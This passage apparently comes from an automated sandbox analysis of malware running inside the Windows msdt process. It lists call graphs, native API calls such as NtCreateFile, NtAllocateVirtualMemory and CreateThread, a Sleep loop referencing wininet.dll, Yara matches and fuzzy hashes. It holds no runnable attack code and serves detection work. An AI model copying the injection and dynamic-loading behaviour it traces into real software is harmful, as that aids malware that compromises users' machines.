33846->33796 33847->33846 33879 314a300 33847->33879 33849 3133ec9 33850 3139ea0 LdrLoadDll 33849->33850 33851 3133fd3 33850->33851 33852 3139ea0 LdrLoadDll 33851->33852 33853 3133ff7 33852->33853 33883 313b410 33853->33883 33857 3134083 33858 314a030 2 API calls 33857->33858 33859 3134110 33858->33859 33860 314a030 2 API calls 33859->33860 33862 313412a 33860->33862 33861 31342a6 33861->33796 33862->33861 33863 3139ea0 LdrLoadDll 33862->33863 33864 313416a 33863->33864 33865 3139d70 LdrLoadDll 33864->33865 33866 313420a 33865->33866 33866->33796 33868 3147461 33867->33868 33869 3143e60 LdrLoadDll 33867->33869 33870 3147487 33868->33870 33871 3147474 CreateThread 33868->33871 33869->33868 33870->33793 33871->33793 33873 313a16a 33872->33873 33874 3139ea0 LdrLoadDll 33873->33874 33875 313a1c3 33874->33875 33875->33833 33877 3139ea0 LdrLoadDll 33876->33877 33878 313a2e9 33877->33878 33878->33835 33880 314a30d 33879->33880 33881 3143e60 LdrLoadDll 33880->33881 33882 314a320 33881->33882 33882->33849 33884 313b435 33883->33884 33892 3148320 33884->33892 33887 31483b0 33888 31491f0 LdrLoadDll 33887->33888 33889 31483cc 33888->33889 33898 54b9650 LdrInitializeThunk 33889->33898 33890 31483eb 33890->33857 33893 31491f0 LdrLoadDll 33892->33893 33894 314833c 33893->33894 33897 54b96d0 LdrInitializeThunk 33894->33897 33895 313405c 33895->33857 33895->33887 33897->33895 33898->33890 33899->33807 33901 314813c 33900->33901 33902 31491f0 LdrLoadDll 33900->33902 33905 54b9840 LdrInitializeThunk 33901->33905 33902->33901 33903 313d41e 33903->33600 33905->33903 33906 54b9540 LdrInitializeThunk

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 263 31485f0-3148641 call 31491f0 NtCreateFile
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,03143BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03143BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0314863D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction ID: 364c91686dea08a6c4e3142b85152a78b2e3934141a36e2ddbb5ba7f69a0c76e
                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction Fuzzy Hash: 1CF0BDB2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 259 31485ec-3148606 260 314860c-3148641 NtCreateFile 259->260 261 3148607 call 31491f0 259->261 261->260
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,03143BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03143BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0314863D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 5cfe6653056fa326ba765cdcd1c94c54aebb6a04767aa405a68cbe5c23b7aff4
                          • Instruction ID: 410229c562073217c43f506987b7a74faaed0a3c29c1884c0317fd3304ef395d
                          • Opcode Fuzzy Hash: 5cfe6653056fa326ba765cdcd1c94c54aebb6a04767aa405a68cbe5c23b7aff4
                          • Instruction Fuzzy Hash: 9EF0C4B6200108AFCB08CF88DC94EEB37A9BF8C754F158248FA0DA7240C630E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 270 314869a-314869b 271 3148620-3148641 NtCreateFile 270->271 272 314869d 270->272
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,03143BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03143BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0314863D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 1c49af20de0e676e2577a7926ea5841b539dd0aff2e218a69c58cee13b231836
                          • Instruction ID: ed48337fcf164ad8f8fb0b55fa5be648ea75e5fbfc2ac4c6af73a3c1ac588063
                          • Opcode Fuzzy Hash: 1c49af20de0e676e2577a7926ea5841b539dd0aff2e218a69c58cee13b231836
                          • Instruction Fuzzy Hash: 57E026B2218509AB8B48DF89ED90DAB77EDABCC610B14860DBA5DC3240D635E8118B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtReadFile.NTDLL(03143D82,5E972F65,FFFFFFFF,03143A41,?,?,03143D82,?,03143A41,FFFFFFFF,5E972F65,03143D82,?,00000000), ref: 031486E5
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 91950b6b69623b89db6274836f4e63decbb1275a67f0b6c99bd8a3fc8e8b8726
                          • Instruction ID: 64d4b9b01cb2571ef31a28fcd2361f0055f15db2ebc558d05563b8199ad8ff63
                          • Opcode Fuzzy Hash: 91950b6b69623b89db6274836f4e63decbb1275a67f0b6c99bd8a3fc8e8b8726
                          • Instruction Fuzzy Hash: 4AF0A4B6200108AFCB14DF99DC95EEB77A9AF8C754F158248BE5DA7241D630E811CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtReadFile.NTDLL(03143D82,5E972F65,FFFFFFFF,03143A41,?,?,03143D82,?,03143A41,FFFFFFFF,5E972F65,03143D82,?,00000000), ref: 031486E5
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction ID: 3aea1aa8ba72ad8e5bd17ccc4c59b3750959fda26641e9385df3f07034fa49ea
                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction Fuzzy Hash: F5F0A4B6200208ABCB14DF89DC94EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03132D11,00002000,00003000,00000004), ref: 03148809
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: 3d8cc15541fb10ca76276c076c23ed24835f5e8d4db354c6d89f05906771d8a8
                          • Instruction ID: 68acc558b9613d8bd70ccec04b51a6a02aeeb4bbcbf7cb5a006013f1b5b5e178
                          • Opcode Fuzzy Hash: 3d8cc15541fb10ca76276c076c23ed24835f5e8d4db354c6d89f05906771d8a8
                          • Instruction Fuzzy Hash: D7F0F8B5204218AFCB14DF89DC91EAB77ADAF8C654F158558FE08AB241C631E810CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03132D11,00002000,00003000,00000004), ref: 03148809
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction ID: 4a1499f312d61669cf861b23d0d131e385d9b8a0a536ce31bde422551c000af8
                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction Fuzzy Hash: CAF015B6200208ABCB14DF89CC80EAB77ADAF8C650F118148BE0897241C630F810CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtClose.NTDLL(03143D60,?,?,03143D60,00000000,FFFFFFFF), ref: 03148745
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: ac8f3ef275ffb5603389266cc7413794477d145eb4b470501aa19c226186a6c2
                          • Instruction ID: 02851543ae358d453f42da515a3cfdb788e6366a9e104d4d30510433b1a5a594
                          • Opcode Fuzzy Hash: ac8f3ef275ffb5603389266cc7413794477d145eb4b470501aa19c226186a6c2
                          • Instruction Fuzzy Hash: EDE08C7A241210ABD710EF94CC89ED77768EF48320F008598BA089B252C634E50187A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtClose.NTDLL(03143D60,?,?,03143D60,00000000,FFFFFFFF), ref: 03148745
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction ID: e3ce55902e685e4b12c8ab73d664e4d3f4264c11a7a1ef89782ce20732935bc5
                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction Fuzzy Hash: DDD012752003146BD710EB98CC85E97775CEF48660F154455BA185B242C630F50086E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5ebd1424222ad499265c445217cb335d7b3266215d95d3da9f5e5107edc04869
                          • Instruction ID: ed9a42f02bc050d3aae128de106b1279c4f5a6cd56b5d1909bef49f7a92ec513
                          • Opcode Fuzzy Hash: 5ebd1424222ad499265c445217cb335d7b3266215d95d3da9f5e5107edc04869
                          • Instruction Fuzzy Hash: 12900269611040030245A5590744547046697D5391391C076F1005590CD76188616161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a19fdd7d1e93f07f58dea03ee32a2c6a690ed317a439c8333c2ea1318da44975
                          • Instruction ID: aafb85d337fb01c27913eb7c4cd6fc5dd672c0350296d64dc2290c8ccf6214a3
                          • Opcode Fuzzy Hash: a19fdd7d1e93f07f58dea03ee32a2c6a690ed317a439c8333c2ea1318da44975
                          • Instruction Fuzzy Hash: 8A9002A560204003424571594454656442A97E0241B91C076E10045D0DC66588917165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7a24d7b99301ee6e97563d9975e74b2dcd5edccf484f258a301e6684e7c6ab6f
                          • Instruction ID: aa2c1cbc7b36deb71f05464a5af60fdfb5f82263b7fb93951b3314174aed3a5d
                          • Opcode Fuzzy Hash: 7a24d7b99301ee6e97563d9975e74b2dcd5edccf484f258a301e6684e7c6ab6f
                          • Instruction Fuzzy Hash: 4190027560104402D24065995448686042597E0341F91D066A5014595EC7A588917171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0c124b69ca03a3fb09ec1b56c4cf1b97ca932184079b9f6745475d875939586b
                          • Instruction ID: 2ab777c7f52dd3939e136d645bbc3e68accb5bbcdbc90834c30caaba88fe517a
                          • Opcode Fuzzy Hash: 0c124b69ca03a3fb09ec1b56c4cf1b97ca932184079b9f6745475d875939586b
                          • Instruction Fuzzy Hash: BF90027571118402D25061598444746042597D1241F91C466A0814598D87D588917162
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 337b7cafbc87650e94ee75fb89820e30ddfa1947e632efcdc04244936d8bec89
                          • Instruction ID: dd14477e20b9d92ea1c8d5493e8633e1680aeebe20189772b422e9e59bef2fa5
                          • Opcode Fuzzy Hash: 337b7cafbc87650e94ee75fb89820e30ddfa1947e632efcdc04244936d8bec89
                          • Instruction Fuzzy Hash: 8C90026D61304002D2C07159544864A042597D1242FD1D46AA0005598CCA5588696361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: fd69e0f371f47c8a160f5cbdfe5ac3be0fdd1639e5b715a7dd04bf625433cf5d
                          • Instruction ID: 38144ec1226702b6671015fef3db3d8d51426e714260e98a79a02dffb5a35874
                          • Opcode Fuzzy Hash: fd69e0f371f47c8a160f5cbdfe5ac3be0fdd1639e5b715a7dd04bf625433cf5d
                          • Instruction Fuzzy Hash: D990027560508842D28071594444A86043597D0345F91C066A00546D4D97658D55B6A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ecff816a8d1528ad620b8131a957e752a3b376f7806fba89af8c0c82863ac564
                          • Instruction ID: 15ad14bf3a118abc387309ec893386a5e35c6b21e383d1fa970f69081bfe761c
                          • Opcode Fuzzy Hash: ecff816a8d1528ad620b8131a957e752a3b376f7806fba89af8c0c82863ac564
                          • Instruction Fuzzy Hash: 2A90027560104802D2C07159444468A042597D1341FD1C06AA0015694DCB558A5977E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a67970c1926aa6ad78c9bc03a1a5d47a8938787a44b5d86b59fcdbf6dba84912
                          • Instruction ID: aa5626dc9e3dae44c0fb6aec13d5fc4f3e8b3b6183d2fd925db7fd45c2a133f0
                          • Opcode Fuzzy Hash: a67970c1926aa6ad78c9bc03a1a5d47a8938787a44b5d86b59fcdbf6dba84912
                          • Instruction Fuzzy Hash: 7F90027560104842D24061594444B86042597E0341F91C06BA0114694D8755C8517561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6e843ae3320a03dc13ea5d51ec3f3589c66fba4042087126b9e194176e4215fb
                          • Instruction ID: e08e2c13340cb95b3972368636cff30c099f0024c1651e7e1e55710753dc7804
                          • Opcode Fuzzy Hash: 6e843ae3320a03dc13ea5d51ec3f3589c66fba4042087126b9e194176e4215fb
                          • Instruction Fuzzy Hash: 129002756010C802D2506159844478A042597D0341F95C466A4414698D87D588917161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 3e96a8cfac596fc79252e6a1900d2095b2ba9d4b649ca2575add9fe39526f016
                          • Instruction ID: ed29f54e102d2d59b9d1f8c39c41df8a95a248e4db1839e8d368f0935bc33825
                          • Opcode Fuzzy Hash: 3e96a8cfac596fc79252e6a1900d2095b2ba9d4b649ca2575add9fe39526f016
                          • Instruction Fuzzy Hash: 349002B560104402D28071594444786042597D0341F91C066A5054594E87998DD576A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f879e9782f2a9fe503936ce5664e4ce86c9f875859109208fff442a51e31b316
                          • Instruction ID: 84d90e034e33ec434644dfdb9121380c9ed54612a66c2e2eead3c9cd50d866bd
                          • Opcode Fuzzy Hash: f879e9782f2a9fe503936ce5664e4ce86c9f875859109208fff442a51e31b316
                          • Instruction Fuzzy Hash: DB9002A574104442D24061594454B460425D7E1341F91C06AE1054594D8759CC527166
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 799d1801c8a09ee29c418f0d62a1ae7d35d973c3855238d53d8a33a573e9f14d
                          • Instruction ID: 5a1bcd93a80de366b1bfc34eb9f38d545d5cc81cf7230e403d1ee1e5410d6bc8
                          • Opcode Fuzzy Hash: 799d1801c8a09ee29c418f0d62a1ae7d35d973c3855238d53d8a33a573e9f14d
                          • Instruction Fuzzy Hash: 7A900265642081525685B15944445474426A7E02817D1C067A1404990C86669856E661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 1d63690973e932d8b806fce80962a409828a06bf616dcac9820803a2b8489bc1
                          • Instruction ID: 21e3dbf3bb5f20bd41ee711961e259b28cd1760b886ddfe401e83dc088bb3838
                          • Opcode Fuzzy Hash: 1d63690973e932d8b806fce80962a409828a06bf616dcac9820803a2b8489bc1
                          • Instruction Fuzzy Hash: F490027560104413D25161594544747042997D0281FD1C467A0414598D97968952B161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                          • Associated: 0000000C.00000002.608600190.000000000556B000.00000040.00000800.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_5450000_msdt.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c70078cf0e3bc5b02c2900fb48bb00fd61f3ab1f6d105dc19edfa847135c563f
                          • Instruction ID: 85551cbe5ab99667dbcdff07bb202a09b107ea0d67ab8235d2235917286db484
                          • Opcode Fuzzy Hash: c70078cf0e3bc5b02c2900fb48bb00fd61f3ab1f6d105dc19edfa847135c563f
                          • Instruction Fuzzy Hash: 8C90026561184042D34065694C54B47042597D0343F91C16AA0144594CCA5588616561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 219 3147310-3147352 call 314a030 222 314742c-3147432 219->222 223 3147358-31473a8 call 314a100 call 3139b50 call 3143e60 219->223 230 31473b0-31473c1 Sleep 223->230 231 3147426-314742a 230->231 232 31473c3-31473c9 230->232 231->222 231->230 233 31473f3-3147414 call 3147140 232->233 234 31473cb-31473f1 call 3146f40 232->234 238 3147419-314741c 233->238 234->238 238->231
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 031473B8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 6209a450fb6eca31f2efff5529b39bfa7cf56684ff4a209861beb8cfd36cb1be
                          • Instruction ID: 32bda45253bd955443c784117dd9ffb4318462d051af10e58062b1a35f7860d6
                          • Opcode Fuzzy Hash: 6209a450fb6eca31f2efff5529b39bfa7cf56684ff4a209861beb8cfd36cb1be
                          • Instruction Fuzzy Hash: F0318EBA602700ABD711DF64C8A0FA7B7B8AF48700F04851DFA695B281D770A555CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 239 314730c-314733f 240 314734b-3147352 239->240 241 3147346 call 314a030 239->241 242 314742c-3147432 240->242 243 3147358-31473a8 call 314a100 call 3139b50 call 3143e60 240->243 241->240 250 31473b0-31473c1 Sleep 243->250 251 3147426-314742a 250->251 252 31473c3-31473c9 250->252 251->242 251->250 253 31473f3-3147414 call 3147140 252->253 254 31473cb-31473f1 call 3146f40 252->254 258 3147419-314741c 253->258 254->258 258->251
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 031473B8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_3130000_msdt.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          • Opcode ID: 5107f746bf2c1fc500c451603ac2118d0c8ea04a2fbcd1ddc2ab4cd3cd3c152d
                          • Instruction ID: a4c4a6094800274ef47c9ce685685bb5aca3f28f0a4d6b0f6bbc4910d7c3afba
                          • Opcode Fuzzy Hash: 5107f746bf2c1fc500c451603ac2118d0c8ea04a2fbcd1ddc2ab4cd3cd3c152d
                          • Instruction Fuzzy Hash: 0D217EB5641300ABD710DF64D8A0F6BBBB4EF48704F04816DFA699B281D770A555CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 267 3148900-3148931 call 31491f0 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03133B93), ref: 0314892D
                          Strings
                          Memory Dump Source
